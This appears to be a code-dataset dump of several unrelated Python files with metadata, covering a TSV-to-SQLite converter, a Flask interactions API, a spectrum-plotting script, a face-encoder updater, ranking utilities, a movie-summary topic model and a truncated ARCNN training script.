'Month:str': [u'TEXT', u'Month'],\n 'Client:str': [u'TEXT', u'Client'],\n 'CustomCategory:str': [u'TEXT', u'CustomCategory'],\n 'Direct_Shows:int': [u'INTEGER DEFAULT 0', u'Direct_Shows'],\n 'Direct_Clicks:int': [u'INTEGER DEFAULT 0', u'Direct_Clicks'],\n 'Direct_Cost:float': [u'REAL DEFAULT 0.0', u'Direct_Cost'],\n 'RSYA_Shows:int': [u'INTEGER DEFAULT 0', u'RSYA_Shows'],\n 'RSYA_Clicks:int': [u'INTEGER DEFAULT 0', u'RSYA_Clicks'],\n 'RSYA_Cost:float': [u'REAL DEFAULT 0.0', u'RSYA_Cost'],\n 'Shows:int': [u'INTEGER DEFAULT 0', u'Shows'],\n 'Clicks:int': [u'INTEGER DEFAULT 0', u'Clicks'],\n 'Cost:float': [u'REAL DEFAULT 0.0', u'Cost']}\n\n# В строках должны отсуствовать символы \\# /\ndef make_db(src_file='data', db_name='source.db', sep='\\t', tbl_name='data'):\n\n if len(glob(src_file)) == 0:\n if len(glob('%s*' % src_file)) != 1:\n raise OSError(' len(glob(\\'%s*\\')) != 1.' % src_file)\n os.rename(glob('%s*' % src_file)[0], src_file)\n\n with open(src_file) as src:\n header = src.readline().strip('#\" \\n\\r').split(sep)\n rows = []\n for row in src:\n # Здесь, если в будущем понадобиться, можно передавать в map() расширенную функцию для обработки строк\n rows.append(map(lambda e: e.strip('#\" \\n\\r'), row.split(sep)))\n elem = \", \".join(map(lambda e: '\"{fld_name}\" {fld_type}'.format(fld_name=fld_type[e][1], fld_type=fld_type[e][0]),\n header))\n\n conn = sqlite3.connect(db_name)\n curs = conn.cursor()\n conn.text_factory = str\n\n try:\n curs.execute('DROP TABLE {table}'.format(table=tbl_name))\n except sqlite3.OperationalError:\n pass\n finally:\n createTbl = 'CREATE TABLE IF NOT EXISTS {table} ({fields_type})'.format(table=tbl_name, fields_type=elem)\n curs.execute(createTbl)\n\n # Вставка всех строк в базу\n loader = 'INSERT INTO {table} VALUES ({values})'.format(table=tbl_name, values=\",\".join('?' * len(header)))\n curs.executemany(loader, rows)\n conn.commit()\n conn.close()\n\n\ndef check_db(db_name=u'source.db', tbl_name=u'data'):\n\n conn = sqlite3.connect(db_name)\n curs = conn.cursor()\n\n # Получения уникальных элементов по эти полям для сводной мета-информации\n curs.execute(u'SELECT Client, sum(Cost) FROM {TABLE} GROUP BY Client ORDER BY sum(Cost) DESC'\n .format(TABLE=tbl_name))\n client_tmp = [[row[0], row[1]] for row in curs]\n client_fromdb = [e[0] for e in client_tmp]\n cost_fromdb = [int(e[1]) for e in client_tmp]\n\n curs.execute(u'SELECT DISTINCT Month FROM {TABLE} ORDER BY Month ASC'\n .format(TABLE=tbl_name))\n month_fromdb = [row[0] for row in curs]\n\n curs.execute(u'SELECT DISTINCT CustomCategory FROM {TABLE} ORDER BY CustomCategory ASC'\n .format(TABLE=tbl_name))\n cats_fromdb = [row[0] for row in curs]\n try:\n curs.execute(u'SELECT DISTINCT Region FROM {TABLE} ORDER BY Region ASC'\n .format(TABLE=tbl_name))\n region_fromdb = [row[0] for row in curs]\n except sqlite3.OperationalError:\n region_fromdb = []\n\n return tuple((tbl_name, month_fromdb, client_fromdb, cost_fromdb, region_fromdb, cats_fromdb))\n\n\ndef write_db_info(db_name='source.db', tbl_name='data'):\n\n db = check_db(db_name, tbl_name)\n wb_info = xlsxwriter.Workbook('info.xlsx')\n\n merge_format = wb_info.add_format({'font_name': 'Arial',\n 'font_size': '10',\n 'bold': True,\n 'align': 'center',\n 'valign': 'center',\n 'text_wrap': True,\n 'bg_color': '#a5a5a5',})\n ws_info = wb_info.add_worksheet('Info')\n ws_info.write_row(0, 0, ['Months', 'Competitors', 'Cost', 'Regions', 'Categories', '', 'Client', 'Tgt_Reg'], merge_format)\n ws_info.set_column(0, 5, 12)\n\n for i, n in enumerate(db[1:]):\n ws_info.write_column(1, i, n)\n wb_info.close()\n\nif __name__ == '__main__':\n\n def pars_argv():\n\n parser = argparse.ArgumentParser(description=u'Модуль для конвертации tsv-файла в sqlite базу.', epilog=u'@n-bar')\n\n parser.add_argument('-wd', '--workdir', default=os.path.realpath(os.path.dirname(sys.argv[0])), metavar='',\n help=u'Определяет путь до исходника, полезно, если модуль не лежит в одной с ним папке')\n parser.add_argument('-d', '--data', default='data', metavar='',\n help=u'Название tsv-файл для конвертации (default: %(default)s).')\n parser.add_argument('-b', '--base', default='source.db', metavar='',\n help=u'Имя создаваемой базы данных. (default: %(default)s).')\n parser.add_argument('-s', '--sep', default='\\t', metavar='',\n help=u'Тип сепаротора. (default: %(default)r).')\n\n return parser.parse_args(sys.argv[1:])\n\n opt = pars_argv()\n os.chdir(opt.workdir)\n\n # Настройка логгера\n logger.setLevel(logging.INFO)\n\n handler = logging.FileHandler('.logerror.log')\n handler.setLevel(logging.INFO)\n\n formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')\n handler.setFormatter(formatter)\n\n logger.addHandler(handler)\n logger.info('start tsv2db')\n try:\n make_db(src_file=opt.data, db_name=opt.base, sep=opt.sep)\n write_db_info(db_name=opt.base)\n except Exception as exc:\n logger.exception(repr(exc))\n else:\n logger.info('done tsv2db')", "sub_path": "ya_avtograf/tsv2db.py", "file_name": "tsv2db.py", "file_ext": "py", "file_size_in_byte": 7595, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "logging.getLogger", "line_number": 13, "usage_type": "call"}, {"api_name": "glob.glob", "line_number": 53, "usage_type": "call"}, {"api_name": "glob.glob", "line_number": 54, "usage_type": "call"}, {"api_name": "os.rename", "line_number": 56, "usage_type": "call"}, {"api_name": "glob.glob", "line_number": 56, "usage_type": "call"}, {"api_name": "sqlite3.connect", "line_number": 67, "usage_type": "call"}, {"api_name": "sqlite3.OperationalError", "line_number": 73, "usage_type": "attribute"}, {"api_name": "sqlite3.connect", "line_number": 88, "usage_type": "call"}, {"api_name": "sqlite3.OperationalError", "line_number": 109, "usage_type": "attribute"}, {"api_name": "xlsxwriter.Workbook", "line_number": 118, "usage_type": "call"}, {"api_name": "argparse.ArgumentParser", "line_number": 139, "usage_type": "call"}, {"api_name": "os.path.realpath", "line_number": 141, "usage_type": "call"}, {"api_name": "os.path", "line_number": 141, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 141, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 141, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 150, "usage_type": "attribute"}, {"api_name": "os.chdir", "line_number": 153, "usage_type": "call"}, {"api_name": "logging.INFO", "line_number": 156, "usage_type": "attribute"}, {"api_name": "logging.FileHandler", "line_number": 158, "usage_type": "call"}, {"api_name": "logging.INFO", "line_number": 159, "usage_type": "attribute"}, {"api_name": "logging.Formatter", "line_number": 161, "usage_type": "call"}]} +{"seq_id": "248071829", "text": "# coding: utf-8\nfrom flask import render_template,jsonify,Response,g,request\nfrom flask_login import current_user\nimport json\nfrom ..models import Role,User,Interaction,Tag,PostTag\nfrom . import api\nfrom .. import db\n\n@api.route('/interaction//',methods=['GET'])\ndef get_interaction(id):\n interaction = Interaction.query.get_or_404(id)\n like_degree_one = interaction.light.filter_by(like_degree=0).count()\n like_degree_two = interaction.light.filter_by(like_degree=1).count()\n like_degree_three = interaction.light.filter_by(like_degree=2).count()\n user_role = -1 if current_user.is_anonymous else 0\n interaction.views+=1\n db.session.commit()\n return Response(json.dumps({\n \"kind\":4,\n \"title\":interaction.title,\n \"author\":User.query.get_or_404(interaction.author_id).name,\n \"time\":interaction.time.strftime('%Y-%m-%d'),\n \"body\":interaction.body,\n \"like\":[like_degree_one,like_degree_two,like_degree_three],\n \"editor\":interaction.editor\n }),mimetype='application/json')\n\n\n@api.route('/interactions/recommend/',methods=['GET','POST'])\ndef recommend_interactions():\n interact_id = int(request.get_json().get('article_id'))\n now_interact = Interaction.query.get_or_404(interact_id)\n try:\n tag_id = now_interact.tag[0].tag_id\n tag = Tag.query.get_or_404(tag_id)\n interactions = []\n for _interaction in tag.interactions:\n interactions.append(_interaction.interaction_id)\n sortlist = sorted(interactions, key=lambda id: Interaction.query.get_or_404(id).views,reverse=True)\n recommend_interactions = sortlist[:3] if len(sortlist)>=4 else sortlist\n except:\n recommend_interactions = []\n return Response(json.dumps([{\n \"title\":Interaction.query.filter_by(id=interaction_id).first().title,\n \"description\":Interaction.query.filter_by(id=interaction_id).first().description,\n \"author\":User.query.get_or_404(Interaction.query.filter_by(id=interaction_id).first().author_id).name,\n \"tag\":tag.body,\n \"views\":Interaction.query.filter_by(id=interaction_id).first().views\n }for interaction_id in recommend_interactions]\n ),mimetype='application/json')\n\n\n", "sub_path": "guisheng/guisheng_app/api_1_0/interactions.py", "file_name": "interactions.py", "file_ext": "py", "file_size_in_byte": 2263, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "models.Interaction.query.get_or_404", "line_number": 11, "usage_type": "call"}, {"api_name": "models.Interaction.query", "line_number": 11, "usage_type": "attribute"}, {"api_name": "models.Interaction", "line_number": 11, "usage_type": "name"}, {"api_name": "flask_login.current_user.is_anonymous", "line_number": 15, "usage_type": "attribute"}, {"api_name": "flask_login.current_user", "line_number": 15, "usage_type": "name"}, {"api_name": "flask.Response", "line_number": 18, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 18, "usage_type": "call"}, {"api_name": "models.User.query.get_or_404", "line_number": 21, "usage_type": "call"}, {"api_name": "models.User.query", "line_number": 21, "usage_type": "attribute"}, {"api_name": "models.User", "line_number": 21, "usage_type": "name"}, {"api_name": "flask.request.get_json", "line_number": 31, "usage_type": "call"}, {"api_name": "flask.request", "line_number": 31, "usage_type": "name"}, {"api_name": "models.Interaction.query.get_or_404", "line_number": 32, "usage_type": "call"}, {"api_name": "models.Interaction.query", "line_number": 32, "usage_type": "attribute"}, {"api_name": "models.Interaction", "line_number": 32, "usage_type": "name"}, {"api_name": "models.Tag.query.get_or_404", "line_number": 35, "usage_type": "call"}, {"api_name": "models.Tag.query", "line_number": 35, "usage_type": "attribute"}, {"api_name": "models.Tag", "line_number": 35, "usage_type": "name"}, {"api_name": "models.Interaction.query.get_or_404", "line_number": 39, "usage_type": "call"}, {"api_name": "models.Interaction.query", "line_number": 39, "usage_type": "attribute"}, {"api_name": "models.Interaction", "line_number": 39, "usage_type": "name"}, {"api_name": "flask.Response", "line_number": 43, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 43, "usage_type": "call"}, {"api_name": "models.Interaction.query.filter_by", "line_number": 44, "usage_type": "call"}, {"api_name": "models.Interaction.query", "line_number": 44, "usage_type": "attribute"}, {"api_name": "models.Interaction", "line_number": 44, "usage_type": "name"}, {"api_name": "models.Interaction.query.filter_by", "line_number": 45, "usage_type": "call"}, {"api_name": "models.Interaction.query", "line_number": 45, "usage_type": "attribute"}, {"api_name": "models.Interaction", "line_number": 45, "usage_type": "name"}, {"api_name": "models.User.query.get_or_404", "line_number": 46, "usage_type": "call"}, {"api_name": "models.User.query", "line_number": 46, "usage_type": "attribute"}, {"api_name": "models.User", "line_number": 46, "usage_type": "name"}, {"api_name": "models.Interaction.query.filter_by", "line_number": 46, "usage_type": "call"}, {"api_name": "models.Interaction.query", "line_number": 46, "usage_type": "attribute"}, {"api_name": "models.Interaction", "line_number": 46, "usage_type": "name"}, {"api_name": "models.Interaction.query.filter_by", "line_number": 48, "usage_type": "call"}, {"api_name": "models.Interaction.query", "line_number": 48, "usage_type": "attribute"}, {"api_name": "models.Interaction", "line_number": 48, "usage_type": "name"}]} +{"seq_id": "337251246", "text": "import numpy as np\nimport matplotlib as mpl\nmpl.use('pgf')\n\ndef figsize(scale):\n fig_width_pt = 345 # Get this from LaTeX using \\the\\textwidth\n inches_per_pt = 1.0/72.27 # Convert pt to inch\n golden_mean = (np.sqrt(5.0)-1.0)/2.0 # Aesthetic ratio (you could change this)\n fig_width = fig_width_pt*inches_per_pt*scale # width in inches\n fig_height = fig_width*golden_mean # height in inches\n fig_size = [fig_width,fig_height]\n return fig_size\n\npgf_with_latex = { # setup matplotlib to use latex for output\n \"pgf.texsystem\": \"pdflatex\", # change this if using xetex or lautex\n \"text.usetex\": True, # use LaTeX to write all text\n #\"font.family\": \"serif\",\n #\"font.serif\": [], # blank entries should cause plots to inherit fonts from the document\n \"font.sans-serif\": [],\n #\"font.monospace\": [],\n \"axes.labelsize\": 20, # LaTeX default is 10pt font.\n \"font.size\": 20,\n \"legend.fontsize\": 16, # Make the legend/label fonts a little smaller\n \"xtick.labelsize\": 20,\n \"ytick.labelsize\": 20,\n \"figure.figsize\": figsize(0.9), # default fig size of 0.9 textwidth\n \"pgf.preamble\": [\n r\"\\usepackage[utf8x]{inputenc}\", # use utf8 fonts becasue your computer can handle it :)\n r\"\\usepackage[T1]{fontenc}\", # plots will be generated using this preamble\n ]\n }\n\nmpl.rcParams.update(pgf_with_latex)\n\nimport matplotlib.pyplot as plt\n\n\n# I make my own newfig and savefig functions\ndef newfig(width):\n plt.clf()\n fig = plt.figure(figsize=figsize(width))\n #ax = fig.add_subplot(111)\n ax1 = plt.axes()\n #ax2 = ax1.twinx()\n return fig, ax1\n\ndef savefig(filename):\n plt.tight_layout()\n plt.savefig('{}.pgf'.format(filename))\n plt.savefig('{}.pdf'.format(filename))\n\ndef plot_style(ax1):\n ax1.set_title('Fluorescein emission spectrum')\n ax1.set_xlabel('Wavelength \\ ($nm$)')\n ax1.set_ylabel('Emission \\ ($8$-$bit$)', color = 'k')\n ax1.tick_params('y', colors = 'k')\n ax1.spines['left'].set_color('k')\n #ax2.set_ylabel('$Temperature \\ (^{O}C$)', color = 'g')\n #ax2.tick_params('y', colors = 'g')\n #ax2.spines['right'].set_color('g')\n #ax1.minorticks_on()\n #ax1.grid(which='major', axis='x', linewidth=0.75, linestyle='-', color='0.75')\n #ax1.grid(which='minor', axis='x', linewidth=0.25, linestyle='-', color='0.75')\n #ax1.grid(which='major', axis='y', linewidth=0.75, linestyle='-', color='0.75')\n #ax1.grid(which='minor', axis='y', linewidth=0.25, linestyle='-', color='0.75')\n #ax1.set_ylim(10.008, 10.011)\n #ax1.set_ylim(18375, 18440)\n #ax1.set_xlim(0, 2500)\n ax1.ticklabel_format(style='plain')\n #ax2.ticklabel_format(style='plain')\n\n# Simple plot\n#fig, ax1, ax2 = newfig(1)\nfig, ax1 = newfig(1.8)\nplot_style(ax1)\n\nwavelength, amplitude = np.genfromtxt('Last.csv', delimiter = ',', unpack=True)\nwavelength2, amplitude2, other = np.genfromtxt('SecondLast.csv', skip_header=6, delimiter = ',', unpack=True)\nwavelength3, amplitude3, other = np.genfromtxt('SecondFromBottom.csv', skip_header=6, delimiter = ',', unpack=True)\nwavelength4, amplitude4, other = np.genfromtxt('0.01.csv', skip_header=6, delimiter = ',', unpack=True)\nwavelength5, amplitude5, other = np.genfromtxt('Top.csv', skip_header=6, delimiter = ',', unpack=True)\n\nax1.get_yaxis().get_major_formatter().set_useOffset(False)\n#ax2.get_yaxis().get_major_formatter().set_useOffset(False)\n\nax1.plot(wavelength4, amplitude4, 'b.', label = '0.01 $mol \\ L^{-1}$')\nax1.plot(wavelength5, amplitude5, 'g1', label = '0.001 $mol \\ L^{-1}$')\nax1.plot(wavelength3, amplitude3, 'r+', label = '0.0001 $mol \\ L^{-1}$')\nax1.plot(wavelength2, amplitude2, 'k2', label = '0.00001 $mol \\ L^{-1}$')\n\nlegend = ax1.legend(loc='best', markerscale=2)\nsavefig('/home/iain/Desktop/Github/SpectroscoPi/Poster/EmissionGraph')\n", "sub_path": "Data/Emission/LatexGraph.py", "file_name": "LatexGraph.py", "file_ext": "py", "file_size_in_byte": 3975, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "matplotlib.use", "line_number": 3, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 8, "usage_type": "call"}, {"api_name": "matplotlib.rcParams.update", "line_number": 33, "usage_type": "call"}, {"api_name": "matplotlib.rcParams", "line_number": 33, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.clf", "line_number": 40, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 40, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 41, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 41, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.axes", "line_number": 43, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 43, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.tight_layout", "line_number": 48, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 48, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 49, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 49, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 50, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 50, "usage_type": "name"}, {"api_name": "numpy.genfromtxt", "line_number": 77, "usage_type": "call"}, {"api_name": "numpy.genfromtxt", "line_number": 78, "usage_type": "call"}, {"api_name": "numpy.genfromtxt", "line_number": 79, "usage_type": "call"}, {"api_name": "numpy.genfromtxt", "line_number": 80, "usage_type": "call"}, {"api_name": "numpy.genfromtxt", "line_number": 81, "usage_type": "call"}]} +{"seq_id": "72943455", "text": "import logging\n\nfrom .encoder import get_encoder, extract_zip\nfrom os.path import join\n\nENCODER_PATH = \"facedecoder/temp/encoders\"\nIMAGE_PATH = \"facedecoder/temp/image\"\nZIP_PATH = \"facedecoder/temp/zip\"\nSLEEP_TIME = 2\nlogging.basicConfig(level=logging.DEBUG)\nlog = logging.getLogger(__name__)\n\nlog.setLevel(logging.DEBUG)\n\n\n# ловим сообщение что нужно обновлять из очередени что нужно обновлять\n\n# в очереди по ключу будет сообщение насчет обновления данных(в значение будет идентификатор названия папки где лежит\n# zip архив)\n\ndef run_model_updater(tech_info_about_model: tuple):\n\n token, model_uid = tech_info_about_model\n log.debug(\"Start create model - %r\", model_uid)\n log.debug(\"Extract zip - %r\", model_uid)\n\n # извлекаем содержимое архива в папку\n status: bool = extract_zip(join(ZIP_PATH, model_uid), IMAGE_PATH)\n if status:\n log.debug(\"Done extract zip - %r\", model_uid)\n log.debug(\"create encoders - %r\", model_uid)\n\n result: dict = get_encoder(join(IMAGE_PATH, model_uid), join(ENCODER_PATH, model_uid))\n\n log.debug(\"done encoders - %r\", model_uid)\n return result\n else:\n return {\"faces_encoders\": [], \"faces_mapping\": [], \"status\": status}\n", "sub_path": "facedecoder/manager.py", "file_name": "manager.py", "file_ext": "py", "file_size_in_byte": 1410, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "logging.basicConfig", "line_number": 10, "usage_type": "call"}, {"api_name": "logging.DEBUG", "line_number": 10, "usage_type": "attribute"}, {"api_name": "logging.getLogger", "line_number": 11, "usage_type": "call"}, {"api_name": "logging.DEBUG", "line_number": 13, "usage_type": "attribute"}, {"api_name": "encoder.extract_zip", "line_number": 28, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 28, "usage_type": "call"}, {"api_name": "encoder.get_encoder", "line_number": 33, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 33, "usage_type": "call"}]} +{"seq_id": "152688323", "text": "'''\nCreated on Mar 29, 2017\n\nprovides basic utilities for candidate rankings\n\n@author: meike.zehlike\n'''\n\nimport resource\n\ndef countProtected(ranking):\n result = 0\n for candidate in ranking:\n if candidate.isProtected:\n result += 1\n return result\n\n\ndef normalizeQualifications(ranking):\n \"\"\"normalizes candidate qualifications to be within [0, 1]\"\"\"\n # find highest qualification of candidate\n qualifications = [ranking[i].qualification for i in range(len(ranking))]\n highest = max(qualifications)\n for candidate in ranking:\n candidate.originalQualification = candidate.originalQualification / highest\n candidate.qualification = candidate.qualification / highest\n\n\ndef setMemoryLimit(maxMem):\n if maxMem is None:\n maxMem = -1\n try:\n resource.setrlimit(resource.RLIMIT_MEMLOCK, (1, maxMem))\n return True\n except ValueError:\n return False\n\n\nclass Switch(object):\n def __init__(self, value):\n self.value = value\n self.fall = False\n\n def __iter__(self):\n \"\"\"Return the match method once, then stop\"\"\"\n yield self.match\n raise StopIteration\n\n def match(self, *args):\n \"\"\"Indicate whether or not to enter a case suite\"\"\"\n if self.fall or not args:\n return True\n elif self.value in args: # changed for v1.5, see below\n self.fall = True\n return True\n else:\n return False\n", "sub_path": "src/utilsAndConstants/utils.py", "file_name": "utils.py", "file_ext": "py", "file_size_in_byte": 1472, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "resource.setrlimit", "line_number": 33, "usage_type": "call"}, {"api_name": "resource.RLIMIT_MEMLOCK", "line_number": 33, "usage_type": "attribute"}]} +{"seq_id": "239207390", "text": "import pandas as pd\r\nimport nltk\r\nfrom nltk.corpus import stopwords\r\nfrom nltk import word_tokenize \r\nfrom nltk.stem import WordNetLemmatizer\r\nlemmatizer = WordNetLemmatizer()\r\nfrom sklearn.feature_extraction.text import TfidfVectorizer\r\nfrom sklearn.decomposition import NMF\r\nfrom sklearn.preprocessing import Normalizer\r\nfrom sklearn.pipeline import make_pipeline\r\n\r\n\r\nnltk.download(\"stopwords\")\r\nnltk.download(\"punkt\")\r\nnltk.download(\"wordnet\")\r\nstop_words = set(stopwords.words('english'))\r\n\r\n\r\n\r\n\r\n\r\ndef clean_text(text):\r\n tokens = word_tokenize(text)\r\n tokens_transformed = [lemmatizer.lemmatize(t.lower()) for t in tokens if t not in stop_words]\r\n s = \"\"\r\n for t in tokens_transformed:\r\n s = s + t + \" \"\r\n return s\r\n\r\n\r\ndef make_df():\r\n df_original = pd.read_excel(\"imdb_movie_summary.xlsx\")\r\n df = df_original.copy()\r\n df[\"transformed_summary\"] = df[\"summary\"].apply(clean_text) \r\n \r\n tfidf = TfidfVectorizer() \r\n \r\n \r\n model = NMF(n_components = 100)\r\n \r\n \r\n scaler = Normalizer()\r\n \r\n \r\n pipeline = make_pipeline(tfidf, model)\r\n \r\n df_transformed = pd.DataFrame(pipeline.fit_transform(df.transformed_summary), index = df.titles)\r\n \r\n genre_master = [\"drama\", \"comedy\", \"romance\", \"horror\", \"action\", \"sci-fi\", \"sport\", \"fantasy\", \"crime\", \"music\", \"war\", \"biography\", \"thriller\", \"mystery\", \"family\", \"animation\", \"adventure\", \"musical\", \"history\", \"western\", \"film-noir\" ]\r\n genre_dict = {\"drama\": 1, \"comedy\": 2, \"romance\": 3, \"horror\": 4, \"action\": 5, \"sci-fi\": 6, \"sport\":7, \"fantasy\": 8, \"crime\": 9, \"music\": 10, \"war\": 11, \"biography\": 12, \"thriller\": 13, \"mystery\": 14, \"family\": 15, \"animation\": 16, \"adventure\": 17, \"musical\": 18, \"history\": 19, \"western\": 20, \"film-noir\": 21}\r\n full = []\r\n for g in df.genre:\r\n g = g.lower()\r\n ind = [genre_dict.get(x) for x in g.split(\", \")]\r\n temp = []\r\n for i in range(1, len(genre_master) + 1):\r\n if i in ind:\r\n temp.append(1)\r\n else:\r\n temp.append(0)\r\n full.append(temp)\r\n \r\n df_genre = pd.DataFrame(full, columns = genre_master, index = df.titles)\r\n df_combined = pd.DataFrame(scaler.fit_transform(pd.concat([df_transformed, df_genre], axis = 1)), index = df.titles)\r\n \r\n \r\n return df_combined\r\ndf = make_df()\r\ndf.to_excel(\"df_transformed.xlsx\")\r\n", "sub_path": "model.py", "file_name": "model.py", "file_ext": "py", "file_size_in_byte": 2364, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "nltk.stem.WordNetLemmatizer", "line_number": 6, "usage_type": "call"}, {"api_name": "nltk.download", "line_number": 13, "usage_type": "call"}, {"api_name": "nltk.download", "line_number": 14, "usage_type": "call"}, {"api_name": "nltk.download", "line_number": 15, "usage_type": "call"}, {"api_name": "nltk.corpus.stopwords.words", "line_number": 16, "usage_type": "call"}, {"api_name": "nltk.corpus.stopwords", "line_number": 16, "usage_type": "name"}, {"api_name": "nltk.word_tokenize", "line_number": 23, "usage_type": "call"}, {"api_name": "pandas.read_excel", "line_number": 32, "usage_type": "call"}, {"api_name": "sklearn.feature_extraction.text.TfidfVectorizer", "line_number": 36, "usage_type": "call"}, {"api_name": "sklearn.decomposition.NMF", "line_number": 39, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.Normalizer", "line_number": 42, "usage_type": "call"}, {"api_name": "sklearn.pipeline.make_pipeline", "line_number": 45, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 47, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 63, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 64, "usage_type": "call"}, {"api_name": "pandas.concat", "line_number": 64, "usage_type": "call"}]} +{"seq_id": "27380265", "text": "from __future__ import print_function\n\nfrom math import log10\n\nimport numpy\nimport h5py\n\nimport torch\nimport torch.nn as nn\nimport torch.optim as optim\nfrom torch.autograd import Variable\nfrom torch.utils.data import DataLoader\nfrom model import NetARCNN\n\nimport argparse\n\nfrom datetime import datetime\n\nlogfile = \"log/log_ARCNN_\" + str(datetime.now()) + \".txt\"\ntrain_data_path = \"dataset/train_data.h5\"\ntest_data_path = \"dataset/test_data.h5\"\ncheckpoint_path = \"checkpoint_ARCNN/\"\n\n\nparser = argparse.ArgumentParser(description=\"Pytorch Deblocking Example\")\nparser.add_argument(\"--batchSize\", type=int, default=100, help=\"training batch size\")\nparser.add_argument(\"--testBatchSize\", type=int, default=30, help=\"testing batch size\")\nparser.add_argument(\"--nEpochs\", type=int, default=30, help=\"number of epochs to train for\")\nparser.add_argument(\"--lr\", type=float, default=0.0001, help=\"Learning Rate\")\n# Notice: it is \"action\" for cuda options, not type\nparser.add_argument(\"--cuda\", action=\"store_true\", help=\"use cuda?\") # what is \"store true\"?\n# parser.add_argument(\"--threads\", type=int, default=4, help=\"number of threads for data loader to use\")\nparser.add_argument(\"--seed\",type=int, default=123, help=\"random seed to use. Default = 123\")\n# parser.add_argument(\"--logfile\",type=str, default=logfile, help=\"name of log file for training\")\nopt = parser.parse_args()\nprint(opt)\n\n\n\nprint(\"===> Building logfile\")\noutput = open(logfile,'a+')\n# output = open(\"log_\"+str(datetime.now())+\".txt\")\n# output = open(\"train_result.txt\")\noutput.write(\"Model: ARCNN\\nbatchSize: {}\\ntestBatchSize: {}\\nnEpochs: {}\\nlearningRate: {}\\n\\nEpoch |PSNR before |PSNR after\".format(opt.batchSize, opt.testBatchSize, opt.nEpochs, opt.lr))\noutput.close()\n\ncuda = opt.cuda\nif cuda and not torch.cuda.is_available():\n raise Exception(\"No GPU found, please run without --cuda\") \n\ntorch.manual_seed(opt.seed)\nif cuda:\n torch.cuda.manual_seed(opt.seed)\n\n# print(\"===> Loading datasets\")\n\nprint(\"===> Building model\")\nmodel = NetARCNN()\n# model.load_state_dict(torch.load(checkpoint_path+\".pkl\"))\n\ncriterion = nn.MSELoss()\n\nif cuda:\n model = model.cuda()\n criterion = criterion.cuda()\n\noptimizer = optim.Adam(model.parameters(), lr=opt.lr)\n\ndef train(epoch, train_data, batch_size):\n\n epoch_loss = 0\n iter_num = 10\n for i in range(iter_num):\n\n # !! iter_num is only for testing and need to be updated later\n\n ran = numpy.sort(numpy.random.choice(train_data['data'].shape[0], batch_size, replace=False))\n batch_data = Variable(torch.from_numpy(train_data['data'][ran,:,:,:].astype(numpy.float32)/255.0))\n batch_label = Variable(torch.from_numpy(train_data['label'][ran,:,:,:].astype(numpy.float32)/255.0))\n if cuda:\n batch_data = batch_data.cuda()\n batch_label = batch_label.cuda()\n\n optimizer.zero_grad()\n # Error: argument 0 is not a Variable ?\n # Maybe it is because the order of the batch_data? currently [4*32*32*1]\n # the correct order is [4*1*32*32] and I have already fixed it,\n # but the bug is still exist\n # print(batch_data)\n loss = criterion(model(batch_data), batch_label)\n epoch_loss += loss.data[0]\n loss.backward()\n optimizer.step()\n\n print(\"===> Epoch[{}]({}/{}): Loss: {:.6f}\".format(epoch, i, iter_num, loss.data[0]))\n \n print(\"===> Epoch {} Complete: Avg. Loss: {:.6f}\".format(epoch, epoch_loss / iter_num))\n \n\n\ndef test(epoch, test_data, test_batch_size):\n avg_psnr1 = 0\n avg_psnr2 = 0\n iter_num = 5\n for i in range(iter_num):\n\n # !! iter_num is only for testing and need to be updated later\n\n ran2 = numpy.sort(numpy.random.choice(test_data['data'].shape[0],test_batch_size, replace=False))\n batch_data = Variable(torch.from_numpy(test_data['data'][ran2,:,:,:].astype(numpy.float32)/255.0))\n batch_label = Variable(torch.from_numpy(test_data['label'][ran2,:,:,:].astype(numpy.float32)/255.0))\n if cuda:\n batch_data = batch_data.cuda()\n batch_label = batch_label.cuda()\n\n prediction = model(batch_data)\n \n mse1 = criterion(batch_data, batch_label)\n mse2 = criterion(prediction, batch_label)\n psnr1 = 10 * log10(1 / mse1.data[0])\n psnr2 = 10 * log10(1 / mse2.data[0])\n\n avg_psnr1 += psnr1\n avg_psnr2 += psnr2\n print(\"===> Before: Avg. PSNR: {:.5f} dB; after: Avg. PSNR: {: .5f} dB\".format((avg_psnr1 / iter_num), (avg_psnr2 / iter_num)))\n # print the result to a file so as to track the tendency\n # output = open('train_result.txt','a+')\n output = open(logfile, 'a+')\n output.write(\"{} {: .5f} {: .5f}\\n\".format(epoch, (avg_psnr1/iter_num), (avg_psnr2/iter_num)))\n output.close()\n\ndef checkpoint(epoch):\n # model_out_path = 